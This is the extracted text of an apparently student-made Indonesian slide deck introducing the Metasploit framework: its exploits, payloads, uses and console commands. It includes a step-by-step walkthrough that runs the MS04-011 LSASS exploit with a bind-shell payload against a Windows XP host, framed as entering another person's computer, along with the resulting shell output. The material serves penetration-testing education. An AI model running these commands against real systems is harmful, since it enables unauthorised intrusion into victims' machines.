MetasploitHauliza RindhayantiKezia Velda RobertaWilliam Gunawan
Metasploit
Pengenalan Metasploit Kegunaan Metasploit
Perintah Metasploit Keunggulan Metasploit
Command Metasploit
Advance Fitur
Metasploit Konsol
Metasploit GUI
Pengenalan Metasploit• metasploit framework adalah sebuah
penetration tool yang cukup powerfull untuk melakukan penestrasi ke dalam sebuah system.
• metasploit framework bisa juga dikatakan sebagai sebuah platform pengembangan untuk membuat tool security dan exploit
Back to metasploit
Pengenalan Metasploit• Metasploit framework sering dibuat dengan
menggunakan bahasa pemrograman Ruby
• Fungsi dasar dari metasploit framework adalah untuk memunculkan modul, membiarkan penggunanya mengkonfigurasikan modul exploit dan mencobanya pada target yang dituju
Pengenalan MetasploitMetasploit biasa dikaitkan dengan istilah remote exploitation, maksudnya walaupun penyusup sistem berada pada jarak jangkauan yang jauh tetapi dapat mengendalikan komputer korban.
Metasploit menyerang dengan cara mengirimkan exploit yang berisi payload yang sudah ditentukan oleh penyusup sistem pada komputer korban.
Pengenalan Metasploit Exploit merupakan software yang berfungsi untuk
memanfaatkan kelemahan pada software korban (misal web browser), setelah berhasil mengeksploitasinya exploit tersebut memasukkan payload ke dalam memori korban.
Walaupun exploit sering digunakan untuk menyerang kerapuhan keamanan (security vulnerability) yang spesifik namun tidak selalu bertujuan untuk melancarkan aksi yang tidak diinginkan. Banyak peneliti keamanan komputer menggunakan exploit untuk mendemonstrasikan bahwa suatu sistem memiliki kerapuhan.
Pengenalan MetasploitPayload merupakan sebuah file executable milik penyusup
yang akan di run pada komputer korban dengan tujuan dapat mengendalikan komputer tersebut secara remote atau memasang backdoor, trojan, virus, worm, dan lain-lain.
Payload dapat disusupi setelah bug berhasil di exploitasi oleh Metasploit Framework. Misal kita pilih payload Generic/Shell_Bind_TCP , artinya kita akan mengambil alih Shell Bind dari target hacking kita
Kegunaan Metasploit
Metasploit framework mempunyai banyak kegunaan dalam berbagai bidang diantaranya adalah :
Pada bidang keamanan jaringan untuk melakukan tes penetrasi
administrator sistem untuk memverifikasi instalasi dan patch sistemnya
vendor produk untuk melakukan tes kelemahan dan peneliti-peneliti keamanan lainnya di dunia
Kegunaan Metasploit
Riset dan penelitian eksploitasi keamanan
memahami cara kerja serangan
Tes penetrasi
Tes IPS/IDS
Dema atau presentasi
Legal hacking Back to metasploit
Perintah Metasploit
use exploitnameNama exploit yang di gunakan dalam exploit metasploit tersebut.
set RHOST hostname_or_ipUntuk mengetahui atau menginstuksikan target lewat remote host atau Ip target
set RPORT host_portUntuk mengatur port yang terhubung lewat remote host ke target tersebut.
set PAYLOAD linux/x86/shell_bind_tcpMengatur payload yang di gunakan lewat platform Linux x86 ke sebuah target ketika shell sudah terpasang.
Perintah Metasploit set LPORT local_port
Menetapkan port di server yang akan di xploit atau target exploit / rexploit
Memanfaatkan kode dari web yang telah di eksekusi , Yupz reload exploit / rexploit memungkinkan perubahan kecil tanpa harus retart konsole tersebut.
sessionsIni untuk membantu agar kita bisa berinteraksi dengan berbagai remote shell yang sudah kita tanam di target / server.
show optionsUntuk mengatur exploit dan payload , show exploits dan show payloads juga dapat menampilkan exploit / payload yang telah di eksekusi.
Back to metasploit
Keunggulan Metasploit Kompatibilitas User interface
metasploit mempunyai tampilan konsole yang interaktif, tampilan web yang dinamis, eksploitasi perintahnya interaktif,
Exploits Payloads auxiliary
Back to metasploit
Command pada MetasploitBerikut ini beberapa contoh command pada metasploit :
Command : msf > help (digunakan untuk melihat perintah-perintah pada metasploit framework)
Command : msf > show exploits (digunakan untuk mengetahui macam-macam exploit yang terkandung di dalam metasploit framework)
Command : msf > show payloads (digunakan untuk mengetahui macam-macam payload yang terkandung di dalam metasploit framework)
Back to metasploit
Metasploit KonsolBerikut ini beberapa langkah untuk masuk ke komputer orang lain :
1. Masuk ke konsol dengan menekan tombol CTRL+O.2. Setelah itu, maka akan muncul konsol spt ini
| | o _ _ _ _ _|_ __, , _ | | __ _|_ / |/ |/ | |/ | / | / \_|/ \_|/ / \_| | | | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/ /| \| =[ msf v3.1-release + -- --=[ 262 exploits - 117 payloads + -- --=[ 17 encoders - 6 nops =[ 46 aux msf >
5. Untuk load modul exploit, kita gunakan exploit lsassmsf > use windows/smb/ms04_011_lsass
6. Tentukan sistem operasi yang digunakan target, misal : target menggunakan XP msf exploit(ms04_011_lsass) > set target 2 target => 2
7. Tampilkan semua payload yang ada pada metasploit Framework msf exploit(ms04_011_lsass) > show payloads
8. karena kita ingin masuk ke dalam konsol, maka kita pilih payload generic/shell_bind_tcp. msf exploit(ms04_011_lsass) > set payload generic/shell_bind_tcp payload => generic/shell_bind_tcp
9. Selanjutnya, tentukan IP si target, misal IP target “192.168.113.14 “ msf exploit(ms04_011_lsass) > set RHOST 192.168.113.14 RHOST => 192.168.113.14
10. Kemudian,tinggal menjalankan perintah exploit... msf exploit(ms04_011_lsass) > exploit
output dari command exploit : [*] Started bind handler [*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.113.14[\lsarpc]... [*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.113.14[\lsarpc]... [*] Getting OS information... [*] Trying to exploit Windows 5.1 [*] Command shell session 3 opened (192.168.113.25:8471 -> 192.168.113.14:4444) [*] The DCERPC service did not reply to our request
Dapat dilihat pada output terdapat tulisan “Command shell session 3 opened” yang berarti kita sudah berhasil masuk ke dalam komputer korban dan shell kita di simpan di session 3.
11. Selanjutnya kita tampilkan isi sessionmsf exploit(ms04_011_lsass) > sessions -l
Active sessions =============== Id Description Tunnel -- ----------- ------ 3 Command shell 192.168.113.25:8471 -> 192.168.113.14:4444
12. Terakhir, kita masuk ke dalam session 3 tersebutmsf exploit(ms04_011_lsass) > sessions -i 3 [*] Starting interaction with 3... Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>
Back to metasploit
Advanced Fitur Meterpreter PassiveX Payloads Chainable Proxies Win32 UploadExec Payloads Win32 DLL Injection Payloads VNC Server DLL Injection
Back to metasploit
Metasploit GUIPilih modul exploits atau auxillary yang akan digunakan, double klik pada modul tersebut lalu ikuti langkah-langkahnya.
KILLBILL SMB EXPLOIT
Pilih target yang akan dieksploit
Pilih Payloads yang akan digunakan
Masukkan IP Target
Confirm Setting
Informasi Modul
Output Modul
TERIMA KASIH